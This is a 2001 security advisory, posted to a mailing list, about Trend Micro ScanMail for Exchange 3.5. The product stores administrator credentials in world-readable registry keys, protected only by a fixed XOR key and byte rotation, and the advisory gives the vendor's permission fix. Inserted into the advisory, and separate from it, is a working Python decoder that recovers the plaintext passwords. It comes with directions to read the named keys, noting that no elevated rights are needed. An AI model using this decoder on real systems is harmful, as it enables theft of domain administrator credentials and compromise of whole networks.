From: Maucher, Jon (jmaucherHARRIS.COM)
Date: Fri Mar 30 2001 - 13:49:58 CST


    ==================================================================================
                                STAT Security Advisory
                               http://www.statonline.com/

    Software Vendor: Trend Micro (www.antivirus.com)
    Software Package: ScanMail for Exchange
    Versions Affected: 3.5 Evaluation (possibly others)
    Synopsis: Account names and passwords stored unprotected
                                    in registry
    Issue Date: March 30, 2001

    Vendor Response: Vendor notified March 1, 2001
                            Solution received March 5, 2001
                            Vendor fix notification received March 29, 2001
    ==================================================================================

    1. Summary

    Trend Micro's ScanMail for Exchange (version 3.5) stores user credentials in
    the system registry with no protection. These credentials are NT domain
    credentials: a valid NT domain or system username, the NT domain name, and
    the password. This occurs in at least two places, once when the product is
    installed and once for use by the Management Console. Since both
    installation and management require administrative privileges, the stored
    credentials belong to an administrative account, and that account (for the
    system or for the entire domain) can be compromised.

    2. Problem Description

    Several registry values are created during installation and during use
    of the product's Management Console to store the credentials of the
    last user to log on. These credentials are valid at least on the server,
    and possibly on the entire domain, depending on which user logged on last.
    Additionally, these keys are created with Everyone granted Special Access,
    which includes the ability to read the values, so any local user can read
    them. The usernames and passwords are not encrypted, only obfuscated: they
    are XOR'ed with a constant key (0xB15A0E707EEDEB80F70FB78F1399) and rolled
    (rotated) right by some number of characters.

    For example, if the Administrator's password is "test", then one of the
    following values would be stored (the first is "test" XOR'ed with the first
    four bytes of the key, 0x74^0xB1 = 0xC5 and so on; the others are byte
    rotations of it):

    C53F7D04
     -or-
    3F7D04C5
     -or-
    7D04C53F
     -or-
    04C53F7D

    The result is a possible administrative compromise of the system (or quite
    possibly of an entire domain).
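Because the scheme is a fixed XOR plus a roll, anyone who can read the values can reverse it. The decoder below is an added example, not code from the advisory or from Trend Micro. It assumes the stored value is a hex string, that the 14-byte key is applied starting from its first byte and (an assumption the page does not state) repeated for longer inputs, and that the roll moves whole bytes; the four "test" values listed above are byte rotations of one XOR result, so the decoder undoes every possible rotation and keeps the candidate that is printable ASCII. All function and variable names are the example's own.

```python
import itertools
from typing import List, Optional, Tuple

# 14-byte constant XOR key quoted in the advisory
SCANMAIL_KEY = bytes.fromhex("B15A0E707EEDEB80F70FB78F1399")


def _xor_with_key(data: bytes) -> bytes:
    # Assumption: the key is applied from byte 0 and cycled for inputs longer than 14 bytes
    return bytes(b ^ k for b, k in zip(data, itertools.cycle(SCANMAIL_KEY)))


def obfuscate(plaintext: str, rotate: int = 0) -> str:
    """Reproduce a stored value: XOR with the key, then roll the bytes right by `rotate`.

    With rotate=0, "test" gives "C53F7D04", the first value quoted in the advisory.
    """
    xored = _xor_with_key(plaintext.encode("latin-1"))
    if xored:
        rotate %= len(xored)
        if rotate:
            xored = xored[-rotate:] + xored[:-rotate]
    return xored.hex().upper()


def candidates(stored_hex: str) -> List[Tuple[int, str]]:
    """Undo each possible byte rotation and XOR; return (shift, text) for every alignment."""
    data = bytes.fromhex(stored_hex)
    results = []
    for shift in range(len(data)):
        unrolled = data[shift:] + data[:shift]  # roll left by `shift` to undo a right roll
        results.append((shift, _xor_with_key(unrolled).decode("latin-1")))
    return results


def recover(stored_hex: str) -> Optional[str]:
    """Return the plaintext if exactly one alignment yields printable ASCII, else None.

    A wrong alignment XORs data against the wrong key byte, which usually flips the
    high bit and produces a non-ASCII character, so the correct alignment stands out.
    """
    good = [text for _, text in candidates(stored_hex)
            if text.isascii() and text.isprintable()]
    return good[0] if len(good) == 1 else None


if __name__ == "__main__":
    # The four values the advisory lists for the password "test"
    for value in ("C53F7D04", "3F7D04C5", "7D04C53F", "04C53F7D"):
        print(value, "->", recover(value))
```

Feed it the strings read from the RemoteManagement and UserInfo keys named in the Solution section; with Everyone granted read access, no elevated rights are needed to obtain them. For short values a single alignment survives the printable-ASCII filter; if several do, `candidates()` lists them all for manual inspection.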

    3. Solution

    Trend Micro recommends, as a temporary fix, that the following keys (and all
    sub-keys) have their permissions set to Full Control for Administrators and
    SYSTEM only (remove all other permissions, including Everyone):

    HKLM\Software\TrendMicro\ScanMail for Exchange\RemoteManagement
    HKLM\Software\TrendMicro\ScanMail for Exchange\UserInfo

    The vendor is implementing a new encryption method that will be
    available in version 5.1 of ScanMail for Exchange.

    4. Credits

    This vulnerability was discovered and researched by Jon Maucher
    and Bill Wall of Harris Corporation.
